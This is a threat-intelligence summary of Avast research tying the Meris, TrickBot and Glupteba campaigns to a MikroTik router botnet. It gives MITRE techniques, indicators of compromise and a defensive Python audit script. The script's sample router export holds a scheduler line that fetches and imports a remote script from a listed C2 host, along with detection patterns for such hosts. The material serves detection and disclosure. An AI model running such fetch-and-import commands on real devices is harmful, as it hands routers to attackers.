Avast Threat Labs connects Meris, TrickBot, and Glupteba campaigns to a single C2 that covertly controls roughly 230,000 MikroTik routers in a botnet-as-a-service. The research traces exploitation of CVE-2018-14847, widespread use of default credentials, and proxy-based operations to cryptomining, DDoS, and TrickBot activity behind Cloudflare-protected domains. #Meris #MikroTik
Keypoints
- Researchers link Meris botnet, Glupteba, TrickBot, and related cryptomining/DDoS activity to a single C2 server controlling ~230K MikroTik routers, suggesting a botnet-as-a-service model.
- CVE-2018-14847 and default credentials enabled broad compromise of MikroTik devices, often left unpatched and exposed on the internet.
- A honeypot exposed to the internet showed login attempts within 15 minutes, with initial fetches targeting domains like bestony.club and Cloudflare-hidden hosts.
- The attackers used a multi-stage script chain: a first-stage fetch then second-stage payloads, frequently re-pointing to domains behind Cloudflare with a common GUID across stages.
- The operation hardened routers by closing management interfaces except SSH/WinBox and enabling a SOCKS4 proxy on port 5678, creating a stealthy proxy network for malicious traffic.
- Meris/DDoS evidence ties to Yandex and other targets; the C2 servers and domains observed in this operation overlap with previously reported campaigns, suggesting shared infrastructure.
- TrickBot activity shows MikroTik NAT-based traffic relaying to hidden C2s, with LigoWave devices also implicated via default credentials and proxy configurations; the IoCs point to a broad, IoT-focused proxy-based botnet ecosystem.
- Defensive guidance emphasizes updating MikroTik devices, removing public-facing admin interfaces, inspecting NAT rules, and reviewing user accounts to disrupt this botnet ecosystem.
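As an added example that is not part of the Avast write-up or of this summary, the following Python script audits the text of a RouterOS `/export` for the configuration traits the keypoints describe: a SOCKS proxy enabled on port 5678, scheduler entries named U3..U7 that fetch and import remote scripts, NAT rules pointing at the listed C2 hosts, management services left enabled, and user accounts beyond the ones you created. The indicator values (port 5678, names U3..U7, bestony.club, tik.anyget.ru, 116.202.93.14, 31.14.40.116) come from this page; the sample export, the GUID placeholder, the `service` account name and the `EXPECTED_USERS` set are constructed assumptions.

```python
import shlex

# Indicator values taken from the summary above; the rest of the config is constructed.
SOCKS_PORT = "5678"
SCHEDULER_NAMES = {f"U{i}" for i in range(3, 8)}
IOC_HOSTS = {"bestony.club", "tik.anyget.ru", "116.202.93.14", "31.14.40.116"}
MGMT_SERVICES = {"telnet", "ftp", "www", "www-ssl", "api", "api-ssl", "winbox", "ssh"}
EXPECTED_USERS = {"admin"}  # assumption: replace with the accounts you actually provisioned


def parse_export(text):
    """Parse RouterOS '/export' text into {section: [entry, ...]}.

    A line starting with '/' opens a section; 'add'/'set' lines carry key=value
    pairs (quoted values may contain spaces). A trailing backslash continues the
    line, approximating how real exports wrap long values.
    """
    sections, section, pending = {}, None, ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.endswith("\\"):          # join wrapped lines before tokenising
            pending += line[:-1] + " "
            continue
        line, pending = pending + line, ""
        if line.startswith("/"):
            section = line
            sections.setdefault(section, [])
            continue
        if section is None:
            continue
        verb, *tokens = shlex.split(line)
        entry = {"_verb": verb}
        for tok in tokens:
            if "=" in tok:
                key, value = tok.split("=", 1)
                entry[key] = value
            else:
                entry["_name"] = tok     # e.g. "set ssh disabled=no" -> name "ssh"
        sections[section].append(entry)
    return sections


def ioc_hits(entry):
    """Return the known C2 hosts that appear anywhere in an entry's values."""
    blob = " ".join(str(v) for v in entry.values())
    return sorted(h for h in IOC_HOSTS if h in blob)


def audit(export_text):
    """Return human-readable findings for the traits described in the write-up."""
    cfg = parse_export(export_text)
    findings = []
    for e in cfg.get("/ip socks", []):
        if e.get("enabled") == "yes":
            port = e.get("port", "1080")
            tag = " (matches the Meris SOCKS4 port)" if port == SOCKS_PORT else ""
            findings.append(f"SOCKS proxy enabled on port {port}{tag}")
    for e in cfg.get("/system scheduler", []):
        name, event = e.get("name", ""), e.get("on-event", "")
        if name in SCHEDULER_NAMES or ("fetch" in event and "import" in event):
            findings.append(f"scheduler '{name}' fetches and imports a remote script: {event}")
        for host in ioc_hits(e):
            findings.append(f"scheduler '{name}' references known C2 host {host}")
    for e in cfg.get("/ip service", []):
        svc = e.get("_name")
        if svc in MGMT_SERVICES and e.get("disabled", "no") != "yes":
            findings.append(f"management service '{svc}' enabled; confirm it is not internet-facing")
    for e in cfg.get("/ip firewall nat", []):
        hits = ioc_hits(e)
        if hits:
            findings.append(f"NAT rule ({e.get('action')}) references known C2 host(s): {', '.join(hits)}")
        elif e.get("action") == "dst-nat":
            findings.append(f"dst-nat rule forwards traffic to {e.get('to-addresses', '?')}; review")
    for e in cfg.get("/user", []):
        name = e.get("name")
        if name and name not in EXPECTED_USERS:
            findings.append(f"user account '{name}' present; confirm it is expected")
    return findings


# Constructed sample export (not from a real device); the GUID placeholder and the
# 'service' account are invented for illustration.
SAMPLE_EXPORT = r"""
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www disabled=yes
set ssh disabled=no
set winbox disabled=no
/ip socks
set enabled=yes port=5678
/system scheduler
add name=U6 interval=10m on-event="/tool fetch url=http://bestony.club/poll/GUID-PLACEHOLDER \
    mode=http dst-path=u6.rsc; /import u6.rsc"
/ip firewall nat
add chain=srcnat action=masquerade out-interface=ether1
add chain=dstnat action=dst-nat protocol=tcp dst-port=443 to-addresses=116.202.93.14 to-ports=443
/user
add name=admin group=full
add name=service group=full
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE_EXPORT):
        print("[!]", finding)
```

Run it against the output of `/export` copied from a device; a clean router yields an empty list, while the constructed sample above produces findings for the SOCKS port, the U6 scheduler, the dst-nat rule to the listed C2 address, the two management services still enabled, and the extra user account. Plain srcnat masquerade is normal on a home router and is deliberately not flagged unless it references a listed host.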
MITRE Techniques
- [T1190] Exploit Public-Facing Application – The vulnerability CVE-2018-14847 allowed attackers to bypass authentication on MikroTik routers. ‘the CVE described above … bypass authentication on the routers.’
- [T1105] Ingress Tool Transfer – The first network request after infection retrieved additional scripts from external domains. ‘The first fetch that happened after the attacker got inside went to: bestony.club’
- [T1053] Scheduled Task – The attacker overwrote and renamed scheduled scripts (U3..U7) and set tasks to repeatedly import fetched scripts. ‘overwrite and rename all existing scheduled scripts named U3, U4..U7 and set scheduled tasks to repeatedly import script’
- [T1090] Proxy – The router enables a SOCKS4 proxy server on port 5678, effectively turning the device into a proxy for malicious traffic. ‘enables the SOCKS4 proxy server on port 5678.’
- [T1036] Masquerading – NAT masquerade rules were used to allow the hidden C2 to access the internet through the router. ‘masquerade rules used to allow the hidden C2 to access the internet through the router’
- [T1078] Valid Accounts – Default credentials and exposed admin accounts facilitated initial access. ‘default credentials … exposed on the internet.’
- [T1071.001] Web Protocols – Communications with the C2 occurred via HTTP requests, including URLs like http://[domainname]/poll/[GUID]. ‘The URLs had the same format: http://[domainname]/poll/[GUID]’
- [T1496] Resource Hijacking – Crypto mining campaigns leveraged MikroTik routers to inject mining scripts and mine via compromised devices. ‘crypto mining malware cleverly setting up the router … to inject crypto mining JavaScript …’
- [T1499] Denial of Service – The Mēris botnet carried out large-scale DDoS attacks against Yandex and other targets. ‘one of the most significant DDoS attacks against Yandex, the biggest search engine in Russia’
Indicators of Compromise
- [IP Address] Main C2 host and TrickBot proxies – 116.202.93.14, 31.14.40.116
- [Domain] C2 domains used in the campaigns – bestony.club, tik.anyget.ru
- [SHA-256] Glupteba ARM32 proxy sample – a0b07c09e5785098e6b660f93097f931a60b710e1cf16ac554f10476084bffcb
- [VPN Domain] VPN servers used for proxying – s[xx].leappoach.info, s[xx].eeongous.com
- [Domain] Additional C2 domains associated with the infrastructure – globalmoby.xyz, massgames.space
Read more: https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/